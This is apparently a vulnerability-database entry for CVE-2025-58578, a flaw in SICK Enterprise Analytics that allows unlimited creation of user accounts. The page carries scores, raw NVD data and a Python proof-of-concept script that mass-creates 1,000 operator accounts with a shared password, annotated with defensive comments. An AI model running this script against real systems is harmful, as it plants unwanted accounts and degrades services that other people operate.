Security Vulnerability Report
CVE-2025-58578 CVSS 3.8 LOW

CVE-2025-58578

Published: 2025-10-06 07:15:34
Last Modified: 2026-01-27 17:33:44

Description

A user with the appropriate authorization can create any number of user accounts via an API endpoint using a POST request. There are no quotas, checking mechanisms or restrictions to limit the creation.

CVSS Details

CVSS Score
3.8
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L
Note: this 3.8 LOW score is the Secondary-source assessment. The Primary (NVD analyst) assessment in the raw JSON below is CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N, 4.3 MEDIUM; the two differ on the privileges required (low rather than high) and on availability impact (none rather than low).

Configurations (Affected Products)

cpe:2.3:a:sick:enterprise_analytics:*:*:*:*:*:*:*:* - VULNERABLE
SICK related products - for the specific affected versions, refer to SICK PSIRT advisory sca-2025-0010 (https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-58578 PoC - SICK API Unrestricted User Account Creation
#
# What this script demonstrates: the user-creation endpoint accepts an unbounded
# number of authenticated POST requests with no quota, throttling or other
# limit (CWE-770 per the NVD record on this page). It does NOT bypass
# authentication: AUTH_TOKEN must already carry user-creation privileges, which
# is why the vendor-side vector rates PR:H.
#
# Defensive reading: the server-side observable is a burst of POSTs to the
# user-creation endpoint from a single credential within a few seconds, and a
# matching burst of new accounts. A per-principal creation quota, rate limiting
# on the endpoint and audit logging of account creation are the controls a fix
# is expected to add; confirm the fixed versions against SICK advisory
# sca-2025-0010. The script performs no cleanup, so every account it creates is
# left behind and must be removed afterwards.
#
# NOTE(review): `json` is imported but never used (requests' `json=` does the
# serialisation); left in place because this edit only touches comments.
import requests
import json
import concurrent.futures
import time

# Target configuration.
# Placeholder host and path: this page does not name the actual endpoint.
TARGET_URL = "https://target-sick-device/api/users"
# Placeholder. Must be a token that already has user-creation privileges; the
# request is rejected otherwise (no privilege escalation is involved).
AUTH_TOKEN = "Bearer <legitimate_auth_token>"

# Headers for the authenticated JSON API request; shared by every thread
# (read-only, so sharing is safe).
headers = {
    "Authorization": AUTH_TOKEN,
    "Content-Type": "application/json"
}


def create_user(user_index):
    """
    Send one authenticated POST to TARGET_URL creating a user account.

    Args:
        user_index: integer folded into the username and email so each
            request creates a distinct account.

    Returns:
        On any HTTP reply (including 4xx/5xx -- ``raise_for_status`` is not
        called) a dict with ``index``, ``status_code`` and the first 200
        characters of the body as ``response``. If the request itself fails
        (connection error, 10 s timeout) a dict with ``index`` and ``error``
        instead; the caller distinguishes the two by the presence of
        ``status_code``.
    """
    payload = {
        "username": f"attacker_user_{user_index}",
        "password": "P@ssw0rd!2025",
        "role": "operator",
        "email": f"user{user_index}@attacker.com"
    }
    try:
        response = requests.post(TARGET_URL, headers=headers, json=payload, timeout=10)
        return {
            "index": user_index,
            "status_code": response.status_code,
            "response": response.text[:200]
        }
    except Exception as e:
        # Transport-level failure (DNS, refused connection, timeout); recorded
        # rather than raised so one bad request does not abort the batch.
        return {"index": user_index, "error": str(e)}


def exploit_unlimited_creation(num_accounts=1000, max_workers=50):
    """
    Issue ``num_accounts`` create_user calls through a thread pool of
    ``max_workers`` threads and count how many returned a 2xx status.

    Args:
        num_accounts: number of creation requests to send.
        max_workers: size of the ThreadPoolExecutor, i.e. the concurrency.

    Side effects:
        Prints a progress banner and a summary (elapsed time, success/failure
        counts, rate). Returns None. Any non-2xx status or transport error is
        counted as failed. Note that ``successful/elapsed`` raises
        ZeroDivisionError if ``elapsed`` is exactly 0.0 (only plausible with
        ``num_accounts=0`` on a coarse clock).
    """
    print(f"[*] Starting exploitation: creating {num_accounts} accounts")
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Concurrency: {max_workers} threads")
    start_time = time.time()
    successful = 0
    failed = 0
    with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:
        # All requests are submitted up front; as_completed yields them in
        # finish order, so the counters are updated as replies arrive.
        futures = [executor.submit(create_user, i) for i in range(num_accounts)]
        for future in concurrent.futures.as_completed(futures):
            result = future.result()
            # Only a dict carrying status_code can be a success; error dicts
            # from create_user fall through to the failed counter.
            if "status_code" in result and 200 <= result["status_code"] < 300:
                successful += 1
            else:
                failed += 1
    elapsed = time.time() - start_time
    print(f"\n[+] Exploitation completed in {elapsed:.2f} seconds")
    print(f"[+] Successful creations: {successful}")
    print(f"[-] Failed creations: {failed}")
    print(f"[+] Rate: {successful/elapsed:.2f} accounts/second")


if __name__ == "__main__":
    # Entry point: runs with the same values as the function defaults
    # (1000 accounts, 50 threads).
    exploit_unlimited_creation(num_accounts=1000, max_workers=50)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58578", "sourceIdentifier": "[email protected]", "published": "2025-10-06T07:15:33.977", "lastModified": "2026-01-27T17:33:43.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A user with the appropriate authorization can create any number of user accounts via an API endpoint using a POST request. There are no quotas, checking mechanisms or restrictions to limit the creation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sick:enterprise_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "04E8EA78-2780-40C0-B5BA-6CF99DE6355B"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US 
Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}